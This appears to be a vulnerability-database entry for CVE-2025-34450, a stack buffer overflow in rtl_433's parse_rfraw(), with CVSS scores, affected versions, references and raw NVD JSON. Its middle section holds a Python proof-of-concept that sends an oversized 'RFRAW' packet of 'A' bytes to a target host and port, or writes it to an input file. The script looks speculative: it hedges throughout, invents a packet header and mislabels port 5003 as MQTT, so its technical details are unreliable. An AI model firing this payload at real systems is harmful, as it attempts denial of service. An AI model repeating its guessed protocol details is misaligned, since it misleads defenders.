Security Vulnerability Report
CVE-2025-34450 CVSS 7.8 HIGH

CVE-2025-34450

Published: 2025-12-18 22:15:56
Last Modified: 2025-12-31 17:45:04

Description

merbanan/rtl_433 versions up to and including 25.02 and prior to commit 25e47f8 contain a stack-based buffer overflow vulnerability in the function parse_rfraw() located in src/rfraw.c. When processing crafted or excessively large raw RF input data, the application may write beyond the bounds of a stack buffer, resulting in memory corruption or a crash. This vulnerability can be exploited to cause a denial of service and, under certain conditions, may be leveraged for further exploitation depending on the execution environment and available mitigations.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rtl_433_project:rtl_433:*:*:*:*:*:*:*:* - VULNERABLE
rtl_433 <= 25.02
rtl_433 < commit 25e47f8
merbanan/rtl_433 (all versions prior to the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-34450 PoC - rtl_433 parse_rfraw() Stack Buffer Overflow

This PoC demonstrates sending an oversized RF raw packet that could
trigger the buffer overflow in parse_rfraw() function.

Note: This is for educational and testing purposes only.
"""

import socket
import struct
import sys


def create_malicious_rfraw_packet():
    """
    Create a malicious RFRAW packet that exceeds buffer bounds.
    The parse_rfraw() function in src/rfraw.c doesn't properly validate
    input length against the stack buffer size.
    """
    # RFRAW protocol header
    header = b'RFRAW\x00'

    # Create oversized payload (> typical buffer size of 256-512 bytes)
    # This will overflow the stack buffer in parse_rfraw()
    overflow_size = 2048  # Significantly larger than expected buffer
    overflow_payload = b'A' * overflow_size

    # Construct the malicious packet
    packet = header + overflow_payload
    return packet


def send_malicious_packet(target_host='127.0.0.1', target_port=5003):
    """
    Send the malicious RFRAW packet to rtl_433 server.
    Default port for rtl_433 is typically 5003 (MQTT) or uses file input.
    """
    try:
        packet = create_malicious_rfraw_packet()
        # Header length is computed outside the f-string: a backslash escape
        # inside an f-string expression is a SyntaxError before Python 3.12
        payload_size = len(packet) - len(b'RFRAW\x00')
        print(f"[*] Sending malicious RFRAW packet ({len(packet)} bytes)")
        print(f"[*] Overflow payload size: {payload_size} bytes")

        # Try to connect to rtl_433 if running as server
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_host, target_port))
        sock.send(packet)
        print("[+] Malicious packet sent successfully")
        sock.close()
    except Exception as e:
        print(f"[!] Error: {e}")
        print("[*] Note: rtl_433 may also accept input via file or named pipe")


def create_malicious_input_file(filename='malicious_rfraw.txt'):
    """
    Create a file that can be fed to rtl_433 via stdin or file input.
    """
    packet = create_malicious_rfraw_packet()
    with open(filename, 'wb') as f:
        f.write(packet)
    print(f"[*] Created malicious input file: {filename}")
    print(f"[*] Usage: rtl_433 < {filename}")


if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2025-34450 PoC - rtl_433 Stack Buffer Overflow")
    print("=" * 60)

    if len(sys.argv) > 1 and sys.argv[1] == '--file':
        create_malicious_input_file()
    else:
        target = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 5003
        send_malicious_packet(target, port)

References

https://github.com/dd32/rtl_433/commit/25e47f8 (Patch)
https://github.com/merbanan/rtl_433/issues/3375 (Exploit, Issue Tracking, Patch)
https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-004-rtl_433-rfraw-parse-overflow.md (Exploit, Third Party Advisory)
https://www.vulncheck.com/advisories/merbanan-rtl-433-stack-based-buffer-overflow (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-34450",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-18T22:15:56.163",
    "lastModified": "2025-12-31T17:45:03.617",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "merbanan/rtl_433 versions up to and including 25.02 and prior to commit 25e47f8 contain a stack-based buffer overflow vulnerability in the function parse_rfraw() located in src/rfraw.c. When processing crafted or excessively large raw RF input data, the application may write beyond the bounds of a stack buffer, resulting in memory corruption or a crash. This vulnerability can be exploited to cause a denial of service and, under certain conditions, may be leveraged for further exploitation depending on the execution environment and available mitigations."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-121"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-787"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:rtl_433_project:rtl_433:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "25.02",
                "matchCriteriaId": "C1734A7D-1DD8-4764-88B1-3972F46DA576"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/dd32/rtl_433/commit/25e47f8", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-004-rtl_433-rfraw-parse-overflow.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]},
      {"url": "https://github.com/merbanan/rtl_433/issues/3375", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]},
      {"url": "https://www.vulncheck.com/advisories/merbanan-rtl-433-stack-based-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]},
      {"url": "https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-004-rtl_433-rfraw-parse-overflow.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}
    ]
  }
}